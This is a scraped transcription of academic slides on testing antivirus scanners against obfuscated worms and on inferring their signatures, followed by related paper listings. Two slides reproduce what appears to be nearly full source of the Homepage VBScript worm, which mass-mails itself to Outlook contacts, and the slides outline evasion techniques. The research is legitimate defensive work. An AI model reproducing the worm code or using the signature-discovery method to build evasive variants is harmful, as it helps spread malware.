Testing Malware Detectors. Mihai Christodorescu Somesh Jha Wisconsin Safety Analyzer University of Wisconsin, Madison
|
|
- Nora Newman
- 6 years ago
- Views:
Transcription
1 Testing Malware Detectors omesh Jha Wisconsin afety Analyzer
2 Introduction A malware detector identifies malicious content (data, code). 2
3 Introduction A malware detector identifies malicious content (data, code). 3
4 Introduction A malware detector identifies malicious content (data, code). 4
5 Introduction A malware detector identifies malicious content (data, code). 5
6 Introduction A malware detector identifies malicious content (data, code). 6
7 Introduction A malware detector identifies malicious content (data, code). 7
8 Attack Model An attacker tries to make malware appear benign. 8
9 Evasive Maneuvers Obfuscation: same functionality, different form. Malware writers have many tools at their disposal Blackhat tools: MITFALL, CB Mutate,... Commercial tools: Cloakware, PECompact,... Example: the Beagle worm family 9
10 Renaming Obfuscation Fragment of Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) 10
11 Renaming Obfuscation Fragment of Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1) FO... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) FO 11
12 Renaming Obfuscation Fragment of Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1) FO... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) FO Obfuscated fragment of Homepage worm: On Error Resume Next... et will=rumor.opentextfile(wcript.criptfullname,1)... et ego=rumor.opentextfile(folder&"\homepage.html.vbs",2,true) 12
13 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) 13
14 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 14
15 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 15
16 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 16
17 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 17
18 Encapsulation Obfuscation Fragment of the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) Obfuscated fragment of the Homepage worm: Execute( decode( "4F6E F " ) )... Execute( decode( " E...462E " ) )... Execute( decode( "4C696E C660A" ) ) 18
19 How Detection Works Misuse detectors are malware detectors that use signatures to identify malicious code. In this talk: generic method illustrated with virus scanner and worm examples. 19
20 How Detection Works Misuse detectors are malware detectors that use signatures to identify malicious code. In this talk: generic method illustrated with virus scanner and worm examples. McAfee Viruscan signature for the Homepage worm: On Error Resume Next... et InF=FO.OpenTextFile(Wcript.criptFullname,1)... et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) 20
21 How Detection Works On Error Resume Next et W = CreateObject("Wcript.hell") et FO= Createobject("scripting.filesystemobject") Folder=FO.GetpecialFolder(2) et InF=FO.OpenTextFile(Wcript.criptFullname,1) Do While InF.AtEndOftream<>True criptbuffer=criptbuffer&inf.readline&vbcrlf Loop et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) OutF.write criptbuffer OutF.close et FO=Nothing If W.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If et s=createobject("outlook.application") et t=s.getnamepace("mapi") et u=t.getdefaultfolder(6) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).close u.items.item(i).delete End If Next et u=t.getdefaultfolder(3) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).delete End If Next Randomize r=int((4*rnd)+1) If r=1 then W.Run(" elseif r=2 Then W.Run(" elseif r=3 Then W.Run(" ) ElseIf r=4 Then W.Run(" End If Function Mailit() On Error Resume Next et Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then et Mapi=Outlook.GetNamepace("MAPI") et Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount et Mail = Outlook.CreateItem(0) et Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.ubject = "Homepage" Mail.Body = vbcrlf&"hi!"&vbcrlf&vbcrlf&"you've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf et Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.html.vbs" Mail.DeleteAfterubmit = True If Mail.To <> "" Then Mail.end W.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function 21
22 How Detection Works On Error Resume Next et W = CreateObject("Wcript.hell") et FO= Createobject("scripting.filesystemobject") Folder=FO.GetpecialFolder(2) et InF=FO.OpenTextFile(Wcript.criptFullname,1) Do While InF.AtEndOftream<>True criptbuffer=criptbuffer&inf.readline&vbcrlf Loop et OutF=FO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true) OutF.write criptbuffer OutF.close et FO=Nothing If W.regread ("HKCU\software\An\mailed") <> "1" then Mailit() End If et s=createobject("outlook.application") et t=s.getnamepace("mapi") et u=t.getdefaultfolder(6) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).close u.items.item(i).delete End If Next et u=t.getdefaultfolder(3) For i=1 to u.items.count If u.items.item(i).subject="homepage" Then u.items.item(i).delete End If Next Randomize r=int((4*rnd)+1) If r=1 then W.Run(" elseif r=2 Then W.Run(" elseif r=3 Then W.Run(" ) ElseIf r=4 Then W.Run(" End If Function Mailit() On Error Resume Next et Outlook = CreateObject("Outlook.Application") If Outlook = "Outlook" Then et Mapi=Outlook.GetNamepace("MAPI") et Lists=Mapi.AddressLists For Each ListIndex In Lists If ListIndex.AddressEntries.Count <> 0 Then ContactCount = ListIndex.AddressEntries.Count For Count= 1 To ContactCount et Mail = Outlook.CreateItem(0) et Contact = ListIndex.AddressEntries(Count) Mail.To = Contact.Address Mail.ubject = "Homepage" Mail.Body = vbcrlf&"hi!"&vbcrlf&vbcrlf&"you've got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf et Attachment=Mail.Attachments Attachment.Add Folder & "\homepage.html.vbs" Mail.DeleteAfterubmit = True If Mail.To <> "" Then Mail.end W.regwrite "HKCU\software\An\mailed", "1" End If Next End If Next End if End Function 22
23 Testing Goal: Resilience Motivation: Obfuscation libraries are plentiful. Worm families use incremental obfuscations. Need to assess resilience to obfuscation. 23
24 Testing Goal: Resilience Motivation: Obfuscation libraries are plentiful. Worm families use incremental obfuscations. Need to assess resilience to obfuscation. Current AV certification is inadequate. Checks only detection of existing malware at a given point in time. 24
25 Testing Goal: Resilience Question 1: How resistant is a virus scanner to obfuscations or variants of known worms? Question 2: Using the limitations of a virus scanner, can a blackhat determine its detection algorithm? 25
26 Testing Methodology 1. Random testing for resilience assessment Use obfuscation transformations to generate worm instances to be used as test samples. 26
27 Testing Methodology 1. Random testing for resilience assessment Use obfuscation transformations to generate worm instances to be used as test samples. 2. Adaptive testing for signature discovery Use virus scanner detection rates on obfuscated worm instances to learn the signature employed. 27
28 Roadmap Introduction Goals Testing resilience to obfuscation ignature discovery Future work Conclusions 28
29 1. Random testing Worm Parameter Generator Detected / Not detected Obfuscation Algorithm Obfuscated Worm Virus canner 29
30 1. Random testing Worm Parameter Generator Variable renaming Code encapsulation Garbage insertion Code reordering Detected / Not detected Obfuscation Algorithm Obfuscated Worm Virus canner 30
31 1. Random testing Original worm 31
32 1. Random testing Original worm Renaming Obfuscated instances 32
33 1. Random testing Original worm Renaming Obfuscated instances Reordering 33
34 1. Random testing Original worm Renaming Obfuscated instances Reordering Garbage insertion 34
35 1. Random testing Original worm Homepage worm in Norton AV Obfuscated instances Detected Not detected Renaming Total 4432 Reordering Garbage insertion 35
36 1. Random testing Original worm Homepage worm in Norton AV Obfuscated instances Detected Not detected Renaming Total 4432 Reordering Garbage insertion 36
37 1. Random testing Original worm Homepage worm in Norton AV Obfuscated instances Detected Not detected Renaming Total 4432 Reordering False Negative Rate: 11.5% Garbage insertion 37
38 False Negative Rate by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 50% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova Homepage Lucky2 Gacript Yovp 38
39 False Negative Rate ophos cannot cope with obfuscations. by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 50% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova Homepage Lucky2 Gacript Yovp 39
40 False Negative Rate by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 50% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova Homepage Lucky2 Gacript Yovp No improvement over time. 40
41 False Negative Rate by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 72% 75% 50% 53% 38% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova 13% 13% Homepage Lucky2 Gacript Yovp 41
42 False Negative Rate Wild variation in false negative rates. by Worm Norton AntiVirus ophos Antivirus McAfee Virus can 100% 75% 72% 75% 50% 53% 38% 25% 0% 5% 0% Melissa Tune Chantal Anna Kournikova 13% 13% Homepage Lucky2 Gacript Yovp 42
43 False Negative Rate by Obfuscation 100% Norton AntiVirus ophos Antivirus McAfee Virus can 75% 50% 25% 0% 1% Variable renaming Hexadecimal encoding Code reordering Garbage insertion 43
44 False Negative Rate by Obfuscation 100% Norton AntiVirus ophos Antivirus McAfee Virus can 75% 50% 25% Variable renaming handled very well. 0% 1% Variable renaming Hexadecimal encoding Code reordering Garbage insertion 44
45 False Negative Rate Detection fails for both encapsulation and reordering. 100% by Obfuscation Norton AntiVirus ophos Antivirus McAfee Virus can 75% 50% 25% 0% 1% Variable renaming Hexadecimal encoding Code reordering Garbage insertion 45
46 Roadmap Introduction Goals Testing resilience to obfuscation ignature discovery Future work Conclusions 46
47 2. Adaptive Testing ignature discovery algorithm finds the K malware statements that, when obfuscated, create an undetectable malware variant. 1 2 K-1 K 47
48 2. Adaptive Testing ignature discovery algorithm finds the K malware statements that, when obfuscated, create an undetectable malware variant. 1 2 K-1 K We need an opaque obfuscation transformation. 48
49 ignature Discovery Worm Parameter Generator Detected / Not detected Opaque Obfuscation Obfuscated Worm Virus canner 49
50 ignature Discovery Worm Parameter Generator Detected / Not detected Opaque Obfuscation Obfuscated Worm Virus canner 50
51 ignature Discovery Algorithm Original worm 51
52 ignature Discovery Algorithm Original worm 1 st obfuscated instance 52
53 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 53
54 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance 54
55 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 55
56 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance 56
57 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 57
58 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 4 th obfuscated instance 58
59 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 4 th obfuscated instance Not detected 59
60 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 4 th obfuscated instance Not detected Done. 60
61 ignature Discovery Algorithm Original worm 1 st obfuscated instance Not detected 2 nd obfuscated instance Not detected 3 rd obfuscated instance Detected 4 th obfuscated instance Not detected Done. One signature element found in O(log N). 61
62 ignature Discovery Algorithm By biasing the search towards the left, we can find the leftmost signature element. 62
63 ignature Discovery Algorithm By biasing the search towards the left, we can find the leftmost signature element. earch range for second signature element. 63
64 ignature Discovery Algorithm By biasing the search towards the left, we can find the leftmost signature element. earch range for second signature element. Worst running time: O( K log N ) 64
65 Discovered ignatures Worm sample: Homepage Norton AntiVirus Attachment.Add Folder & "\homepage.html.vbs" ophos Antivirus The whole body of the malware. McAfee Virus can On Error Resume Next et InF = FO.OpenTextFile( Wcript.criptFullname, 1 ) et OutF = FO.OpenTextFile( Folder & "\homepage.html.vbs", 2, true ) 65
66 Discovered ignatures Worm sample: Homepage Norton AntiVirus Attachment.Add Folder & "\homepage.html.vbs" ophos Antivirus The whole body of the malware. McAfee Virus can On Error Resume Next et InF = FO.OpenTextFile( Wcript.criptFullname, 1 ) et OutF = FO.OpenTextFile( Folder & "\homepage.html.vbs", 2, true ) Norton AntiVirus ophos Antivirus McAfee Virus can a Homepage 66
67 What If... A virus writer uses signature information to thwart virus scanners. Each virus variant can now evade detection. Viruses can repeatedly try to enter a system, learning the signature in the process. 67
68 Roadmap Introduction Goals Testing resilience to obfuscation ignature discovery Future work Conclusions 68
69 Future Work Binary viruses. ame obfuscation techniques apply. Binary rewriting library work in progress. Refine the signature discovery algorithm. earch below instruction level. Detect more powerful signature classes. 69
70 Conclusions Obfuscation-based testing techniques are useful in comparing virus scanners. Commercial virus scanners have poor resilience to common obfuscation transformations. 70
71 Testing Malware Detectors omesh Jha Wisconsin afety Analyzer
Mihai Christodorescu Somesh Jha University of Wisconsin, Madison {mihai,
Semantics-Aware Mihai Christodorescu Somesh Jha University of Wisconsin, Madison {mihai, jha}@cs.wisc.edu Abstract A malware detector is a system that attempts to determine whether a program has malicious
More informationCUHK CSE ADAM: An Automatic & Extensible Platform Stress Test Android Anti-Virus Systems John Spark Patrick C.S. Lui ZHENG Min P.C.
ADAM: An Automatic & Extensible Platform To Stress Test Android Anti-Virus Systems John C.S. Lui Patrick P.C. Lee 1 of 15 Android Malware Up 3,325% in 2011 1. This past year, we saw a significant increase
More informationSemantics-Aware Malware Detection
Semantics-Aware Malware Detection Mihai Christodorescu Somesh Jha University of Wisconsin, Madison {mihai, jha}@cs.wisc.edu Sanjit A. Seshia Dawn Song Randal E. Bryant Carnegie Mellon University {sanjit@cs.,
More informationLecture 12 Malware Defenses. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides based on Bailey s ECE 422
Lecture 12 Malware Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides based on Bailey s ECE 422 Malware review How does the malware start running? Logic bomb? Trojan horse?
More informationUndetectable Metamorphic Viruses. COMP 116 Amit Patel
Undetectable Metamorphic Viruses COMP 116 Amit Patel Abstract Signature scanning is an efficient technique employed by anti-virus systems to detect known malware. Signature scanning involves scanning files
More informationRetrospective Testing - How Good Heuristics Really Work
Retrospective Testing - How Good Heuristics Really Work Andreas Marx amarx@gega-it.de AV-Test.org University of Magdeburg GEGA IT-Solutions GbR Retrospective Testing I What it is: Use an old (archived)
More informationCSCD 303 Essential Computer Security Fall 2017
CSCD 303 Essential Computer Security Fall 2017 Lecture 13 - Malware Evasion, Prevention, Detection, Removal Reading: Chapter 6 CompTIA Book, Links Overview Malware Techniques for Evasion Detection/Removal
More informationImproved Signature-Based Antivirus System
Improved Signature-Based Antivirus System Osaghae E. O. Department of Computer Science Federal University, Lokoja, Kogi State, Nigeria Abstract: The continuous updating of antivirus database with malware
More informationCSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 10 - Malware Evasion, Prevention, Detection, Removal Reading: Chapter 6 CompTIA Book, Links Overview Malware Techniques for Evasion Detection/Removal
More informationDetecting Self-Mutating Malware Using Control-Flow Graph Matching
Detecting Self-Mutating Malware Using Control-Flow Graph Matching Danilo Bruschi Lorenzo Martignoni Mattia Monga Dipartimento di Informatica e Comunicazione Università degli Studi di Milano {bruschi,martign,monga}@dico.unimi.it
More informationTrend Micro SMB Endpoint Comparative Report Performed by AV-Test.org
Trend Micro SMB Endpoint Comparative Report Performed by AV-Test.org Results from October 2010 Executive Summary In October of 2010, AV-Test.org performed endpoint security benchmark testing on five marketleading
More informationVirus Analysis. Introduction to Malware. Common Forms of Malware
Virus Analysis Techniques, Tools, and Research Issues Part I: Introduction Michael Venable Arun Lakhotia, USA Introduction to Malware Common Forms of Malware Detection Techniques Anti-Detection Techniques
More informationCONSUMER AV / EPP COMPARATIVE ANALYSIS
CONSUMER AV / EPP COMPARATIVE ANALYSIS Exploits Evasion Defenses 2012 Randy Abrams, Nathan Taylor Tested Vendors Avast, AVG, Avira, ESET, F- Secure, Kaspersky, McAfee, Microsoft, Norman, Norton, Panda,
More informationTrend Micro Enterprise Endpoint Comparative Report Performed by AV-Test.org
Trend Micro Enterprise Comparative Report Performed by AV-Test.org Results from October 2010 Executive Summary In October of 2010, AV-Test.org performed endpoint security benchmark testing on five marketleading
More informationTrend Micro SMB Endpoint Comparative Report Performed by AV-Test.org
Trend Micro SMB Endpoint Comparative Report Performed by AV-Test.org A test commissioned by Trend Micro and performed by AV-Test GmbH Executive Summary In May of 2011, AV-Test.org performed endpoint security
More informationAvg Antivirus Manual Latest Version 2013 For Xp
Avg Antivirus Manual Latest Version 2013 For Xp AVG Internet Security 2015 is one of the best antiviruses on the market. Latest version: 2015.0.6037 25/06/15, Last month's downloads: 9,932, Size: 4.8 MB.
More informationAnti-Virus Comparative No.7
Anti-Virus Comparative No.7 On-demand detection of malicious software Date: August 2005 (2005-08) Last revision of this report: 26 th August 2005 Author: Andreas Clementi Website: http://www.av-comparatives.org
More informationHUNTING FOR METAMORPHIC ENGINES
HUNTING FOR METAMORPHIC ENGINES Mark Stamp & Wing Wong August 5, 2006 Outline I. Metamorphic software II. III. IV. Both good and evil uses Metamorphic virus construction kits How effective are metamorphic
More information1 Objectives and Aims
1 Objectives and Aims The principal objective of this proposed research is to investigate and develop methodologies for dimensionality reduction and prediction by combining multiple avenues from machine
More informationTrend Micro Endpoint Comparative Report Performed by AV-Test.org
Trend Micro Endpoint Comparative Report Performed by AV-Test.org Results from May 2010 Executive Summary In May of 2010, AV-Test.org performed endpoint security benchmark testing on five marketleading
More informationSimple Substitution Distance and Metamorphic Detection
San Jose State University SJSU ScholarWorks Master's Projects Master's Theses and Graduate Research Fall 2012 Simple Substitution Distance and Metamorphic Detection Gayathri Shanmugam San Jose State University
More informationMIS Week 6. Operating System Security. Windows Antivirus
MIS 5170 Operating System Security Week 6 Windows Antivirus Tonight s Plan 2 Questions from Last Week Review on-line posts In The News Malware/Spyware Detection tools Antivirus Sniffers Assignment 3 Overview
More informationAnti-Virus Comparative
Anti-Virus Comparative Malware Protection Test Consumer Products File Detection Test with Execution including false alarm test Language: English March 2018 Last Revision: 13 th April 2018 Table of Contents
More informationActivation Screen Virus
How To Get Rid Of Spyware Windows Xp Activation Screen Virus Spyware Clear it's technically not a virus, but it does exhibit plenty of malicious To uninstall the Spyware Clear program from Windows XP,
More informationLimits of Static Analysis for Malware Detection
23rd Annual Computer Security Applications Conference Limits of Static Analysis for Malware Detection Andreas Moser, Christopher Kruegel, and Engin Kirda Secure Systems Lab Technical University Vienna
More informationManually Remove Of Xp Internet Security Protect Virus Manually
Manually Remove Of Xp Internet Security Protect Virus Manually We show you how to remove malware from a PC or laptop. You may also wish to read: Windows users: how to protect your PC from Check now: do
More informationSECURE2013 ANDROTOTAL A SCALABLE FRAMEWORK FOR ANDROID ANTIMALWARE TESTING
SECURE2013 ANDROTOTAL A SCALABLE FRAMEWORK FOR ANDROID ANTIMALWARE TESTING Federico Maggi, Andrea Valdi, Stefano Zanero Politecnico di Milano, DEIB fede@maggi.cc ROADMAP 1. Android threats and protections
More informationMIS Week 6. Operating System Security. Windows Antivirus
MIS 5170 Operating System Security Week 6 Windows Antivirus Tonight s Plan 2 Questions from Last Week Review on-line posts In The News Malware/Spyware Detection tools Antivirus Sniffers Assignment 3 Overview
More informationAnti-Virus Comparative No.1
Anti-Virus Comparative No.1 a) On-demand detection of virus/malware b) On-demand detection of dialers Shortened version Date of Test: 6 February 2004 (2004-02) Author: Andreas Clementi Website: http://www.av-comparatives.org
More informationSingle Product Review. escan Internet Security 11. Language: English September 2010 Last revision: 13 nd October
Single Product Review escan Internet Security 11 Language: English September 2010 Last revision: 13 nd October 2010-1 - Content Downloading and installing the trial version... 3 Post-installation... 4
More informationNext Generation Endpoint Security Confused?
SESSION ID: CEM-W06 Next Generation Endpoint Security Confused? Greg Day VP & Chief Security Officer, EMEA Palo Alto Networks @GreDaySecurity Brief Intro Questions we will answer Do I need a new (NG) endpoint
More informationNorton 360 vs trend micro vs mcafee vs symantec: which anti-virus solution is best
Norton 360 vs trend micro vs mcafee vs symantec: which anti-virus solution is best Search 4 days ago. However, Windows antivirus tools still play an important role in the enterprise security strategy..
More informationMario Vuksan and Tomislav Pericin, ReversingLabs FILE ANALYSIS AND UNPACKING: THE AGE OF 40M NEW SAMPLES PER YEAR
Mario Vuksan and Tomislav Pericin, ReversingLabs FILE ANALYSIS AND UNPACKING: THE AGE OF 40M NEW SAMPLES PER YEAR Agenda Big and scary numbers Introduction to the binary mess out there (the problem) Packers
More informationRemove Manually Norton Internet Security 2012 Will Not Start
Remove Manually Norton Internet Security 2012 Will Not Start Restart your computer to check if you can start your Norton product. I cannot connect to the Internet My Norton product does not work or displays
More informationQuick Heal Microsoft Exchange Protection
Quick Heal Microsoft Exchange Protection Intuitive. Effective. Comprehensive. Feature List Web-based console makes administrative management easy and simple. Comprehensive and rapid scanning of emails
More informationNext Generation Enduser Protection
Next Generation Enduser Protection Janne Timisjärvi Systems Engineer 10.5.2017 What is the the real threat? Encrypted! Give me all your Bitcoin$ Let s check if there Is something of value The Evolution
More informationEvading Network Anomaly Detection Sytems - Fogla,Lee. Divya Muthukumaran
Evading Network Anomaly Detection Sytems - Fogla,Lee Divya Muthukumaran Intrusion detection Systems Signature Based IDS Monitor packets on the network Compare them against database of signatures/attributes
More informationEigenviruses for metamorphic virus recognition
Published in IET Information Security Received on 12th June 2010 Revised on 22nd February 2011 Eigenviruses for metamorphic virus recognition M.E. Saleh 1 A.B. Mohamed 2 A.A. Nabi 3 ISSN 1751-8709 1 Integrated
More informationSmall Office Security 2. Mail Anti-Virus
Small Office Security 2 Mail Anti-Virus Table of content Table of content... 1 Mail Anti-Virus... 2 What is Mail Anti-Virus... 2 Enabling/Disabling Mail Anti-Virus... 2 Operation algorithm of Mail Anti-Virus...
More informationEnsure you write your exam number on any sheets which are to be handed in. This paper consists of THREE pages and FOUR questions.
UNIVERSITY OF HERTFORDSHIRE Academic Year: 2012/13 Semester: B SCHOOL OF COMPUTER SCIENCE [Click here and type Department Title] 7COM1010 SECURE SYSTEMS PROGRAMMING DURATION OF EXAM: 2 Hours THE FOLLOWING
More informationFirewalls, Tunnels, and Network Intrusion Detection
Firewalls, Tunnels, and Network Intrusion Detection 1 Intrusion Detection Systems Intrusion Actions aimed at compromising the security of the target (confidentiality, integrity, availability of computing/networking
More informationSecurity Gap Analysis: Aggregrated Results
Email Security Gap Analysis: Aggregrated Results Average rates at which enterprise email security systems miss spam, phishing and malware attachments November 2017 www.cyren.com 1 Email Security Gap Analysis:
More informationWeb Gateway Security Appliances for the Enterprise: Comparison of Malware Blocking Rates
Web Gateway Security Appliances for the Enterprise: Comparison of Malware Blocking Rates A test commissioned by McAfee, Inc. and performed by AV-Test GmbH Date of the report: December 7 th, 2010 (last
More informationSymantec vs. Trend Micro Comparative Aug. 2009
Symantec vs. Trend Micro Comparative Aug. 2009 On-demand Detection of Malicious Software Language: English August 2009 Last Revision: 28 th October 2009 Tested Products Symantec Endpoint Protection Small
More informationescan Security Network From MicroWorld Technologies Anti-Virus & Content Security
& Content Security Created on: 5th November, 2012 Document Version Number: ESN(14.0.0.1) From MicroWorld Technologies With the growing amount of malware in-the-wild, we realized it would be practically
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 19: Intrusion Detection Department of Computer Science and Engineering University at Buffalo 1 Lecture Outline Intruders Intrusion detection host-based network-based
More informationInternet Security Mail Anti-Virus
Internet Security 2012 Mail Anti-Virus Table of Contents Mail Anti-Virus... 2 What is Mail Anti-Virus... 2 Enabling/disabling Mail Anti-Virus... 2 Operation algorithm of Mail Anti-Virus... 2 Changing Mail
More informationDownload antivirus free
Download antivirus free The Borg System is 100 % Download antivirus free ransomware and other threats. Download for free. DOWNLOAD YOUR KASPERSKY ANTIVIRUS FREE TRIAL. Enjoy the 30-day free trial of Kaspersky
More informationINTELLIGENT MALWARE DETECTION SYSTEM
Sandeep B. Damodhare* Prof. V. S. Gulhane** INTELLIGENT MALWARE DETECTION SYSTEM Abstract: Malicious programs spy on users behavior and compromise their privacy. Unfortunately, existing techniques for
More informationReviewofVirusesandAntivirusPatterns
Global Journal of omputer Science and Technology: Software & Data Engineering Volume 17 Issue 3 Version 1.0 Year 2017 Type: Double Blind Peer Reviewed International Research Journal Publisher: Global Journals
More informationENDPOINT SECURITY WHITE PAPER. Endpoint Security and the Case For Automated Sandboxing
WHITE PAPER Endpoint Security and the Case For Automated Sandboxing A World of Constant Threat We live in a world of constant threat. Every hour of every day in every country around the globe hackers are
More informationMalware Detection based on Dependency Graph using Hybrid Genetic Algorithm
Malware Detection based on Dependency Graph using Hybrid Genetic Algorithm Keehyung Kim, Byung-Ro Moon keehyung@snu.ac.kr School of Computer Science and Engineering Seoul National University July 11, 2010
More informationAutomated Signature Generation: Overview and the NoAH Approach. Bernhard Tellenbach
Automated Signature Generation: Overview and the NoAH Approach Structure Motivation: The speed of insecurity Overview Building Blocks and Techniques The NoAH approach 2 The speed of insecurity Source:
More informationMain idea. Demonstrate how malware can increase its robustness against detection by taking advantage of the ubiquitous Graphics Processing Unit (GPU)
-Assisted Malware Giorgos Vasiliadis Michalis Polychronakis Sotiris Ioannidis ICS-FORTH, Greece Columbia University, USA ICS-FORTH, Greece Main idea Demonstrate how malware can increase its robustness
More informationIntra-procedural Path-insensitive Grams (i-grams) and Disassembly Based Features for Packer Tool Classification and Detection
Air Force Institute of Technology AFIT Scholar Theses and Dissertations 6-14-2012 Intra-procedural Path-insensitive Grams (i-grams) and Disassembly Based Features for Packer Tool Classification and Detection
More informationReport on ESET NOD 32 Antivirus
Report on ESET NOD 32 Antivirus CYBER SECURITY & PRIVACY FOUNDATION 1 Software: NOD 32 Antivirus for Windows Lab Setup: Oracle Virtualbox v4.3.6 r91406 Operating System: Machine 1: Windows 7 32-Bit. Processor:
More informationDETECTING UNDETECTABLE COMPUTER VIRUSES
San Jose State University SJSU ScholarWorks Master's Projects Master's Theses and Graduate Research 2010 DETECTING UNDETECTABLE COMPUTER VIRUSES Sujandharan Venkatachalam San Jose State University Follow
More informationF-Secure Antivirus & Internet Security Discover Top 10 Best Most Effective Antivirus Internet Secur
F-Secure Internet Security offers what many other antivirus programs do not--a complete family protection package. Its revolutionary system combines firewall and antivirus and browsing protection while
More informationCertified Snort Professional VS-1148
VS-1148 Certified Snort Professional Certification Code VS-1148 Vskills certification for Snort Professional assesses the candidate as per the company s need for network security and assessment. The certification
More informationA leading antivirus software company outsmarts viruses and malware and makes the Internet safer.
A leading antivirus software company outsmarts viruses and malware and makes the Internet safer. Technosoft s Threat Researchers improve detection, reduce customer escalations and are at the forefront
More informationBarracuda Advanced Threat Protection. Bringing a New Layer of Security for . White Paper
Barracuda Advanced Threat Protection Bringing a New Layer of Security for Email White Paper Evolving Needs for Protection Against Advanced Threats IT security threats are constantly evolving and improving,
More informationSafe N Sec Enterprise Pro
Anti-Virus Comparative Single Product Test Safe N Sec Enterprise Pro Date: January 2008 Last revision: 26 th January 2008 Author: Andreas Clementi Website: http://www.av-comparatives.org 1. Tested product
More informationIntruders. significant issue for networked systems is hostile or unwanted access either via network or local can identify classes of intruders:
Intruders significant issue for networked systems is hostile or unwanted access either via network or local can identify classes of intruders: masquerader misfeasor clandestine user varying levels of competence
More informationDetecting Malicious Web Links and Identifying Their Attack Types
Detecting Malicious Web Links and Identifying Their Attack Types Anti-Spam Team Cellopoint July 3, 2013 Introduction References A great effort has been directed towards detection of malicious URLs Blacklisting
More informationFILELESSMALW ARE PROTECTION TEST OCTOBER2017
FILELESSMALW ARE PROTECTION TEST OCTOBER2017 1 / 12 INTRODUCTION In times of digitalization of each aspect of public and private life new and interesting techniques of bypassing protections are abundant.
More informationIntel Security Advanced Threat Defense Threat Detection Testing
Intel Security Advanced Threat Defense Threat Detection Testing DR150724C July 2015 Miercom www.miercom.com Contents 1.0 Executive Summary... 3 2.0 Overview... 4 Products Tested... 4 3.0 How We Did It...
More informationVery Fast Containment of Scanning Worms. Nicholas Weaver, Stuart Staniford, Vern Paxson ICSI, Nevis Networks, ICSI & LBNL
